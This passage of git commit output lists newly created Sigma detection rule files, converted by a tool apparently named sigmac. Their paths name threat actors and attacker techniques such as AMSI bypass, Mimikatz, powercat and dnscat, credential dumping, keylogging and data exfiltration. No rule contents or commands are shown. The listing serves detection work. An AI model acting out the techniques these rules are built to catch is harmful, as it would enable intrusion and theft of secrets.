tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powertrash_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml create 
mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_change_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_all_rules.yml create mode 100644 
tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_reset_config.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_setting_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/lsa_server/win_lsa_server_normal_user_admin.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_transportagent.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_transportagent_failed.yml create mode 100644 tools/sigmac/converted_rules/builtin/ntlm/win_susp_ntlm_auth.yml create mode 100644 tools/sigmac/converted_rules/builtin/ntlm/win_susp_ntlm_brute_force.yml create mode 100644 tools/sigmac/converted_rules/builtin/ntlm/win_susp_ntlm_rdp.yml create mode 100644 tools/sigmac/converted_rules/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml create mode 100644 tools/sigmac/converted_rules/builtin/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml create mode 100644 
tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_downgrade_attack.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_exe_calling_ps.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_powercat.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_remote_powershell_session.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_renamed_powershell.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_susp_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_susp_zip_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_xor_commandline.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml create mode 100644 
tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_clear_powershell_history.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_decompress_commands.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_exploit_scripts.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_get_addbaccount.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_get_clipboard.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml create mode 100644 
tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_malicious_commandlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_remote_powershell_session.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_invocation_generic.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_invocation_specific.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_local_group_reco.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_zip_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml create mode 100644 
tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_add_windows_capability.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_adrecon_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_apt_silence_eda.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_as_rep_roasting.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_audio_exfiltration.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_automated_collection.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_capture_screenshots.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_clear_powershell_history.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_copy_item_system_directory.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_cor_profiler.yml create mode 100644 
tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_create_local_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_detect_vm_env.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_directorysearcher.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_dnscat_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_download_com_cradles.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_enable_psremoting.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_etw_trace_evasion.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml create mode 100644 
tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_export_certificate.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_frombase64string_archive.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_get_acl_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_get_adcomputer.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_get_adgroup.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_get_adreplaccount.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_hktl_rubeus.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_hktl_winpwn.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_hotfix_enum.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_icmp_exfiltration.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_command_remote.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml create mode 100644 
tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_keylogging.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_localuser.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_mailboxexport_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_malicious_commandlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_malicious_keywords.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml create mode 100644 
tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_msxml_com.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_ntfs_ads_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_prompt_credentials.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_psasyncshell.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_psattack.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_remote_session_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_root_certificate_installed.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml create mode 100644 
tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_send_mailmessage.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_set_acl.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_set_acl_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_shellcode_b64.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_software_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_ace_tampering.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_directory_enum.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_download.yml create mode 100644 
tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_extracting.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_follina_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_get_current_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_get_gpo.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_get_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_invocation_generic.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_invocation_specific.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_iofilestream.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_keywords.yml create mode 100644 
tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_local_group_reco.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_mail_acces.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_networkcredential.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_new_psdrive.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_recon_export.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_set_alias.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_start_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_unblock_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_wallpaper.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml create mode 
100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_windowstyle.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_write_eventlog.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_zip_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_test_netconnection.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_timestomp.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_token_obfuscation.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_user_profile_tampering.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml create mode 100644 
tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_win32_product_install_msi.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_win_api_susp_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_wmi_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_wmimplant.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_x509enrollment.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_xml_iex.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_7zip_password_compression.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_7zip_password_extraction.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_adplus_memory_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_agentexecutor_susp_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_at_interactive_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_attrib_hiding_files.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_attrib_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_attrib_system_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_auditpol_susp_execution.yml create mode 100644 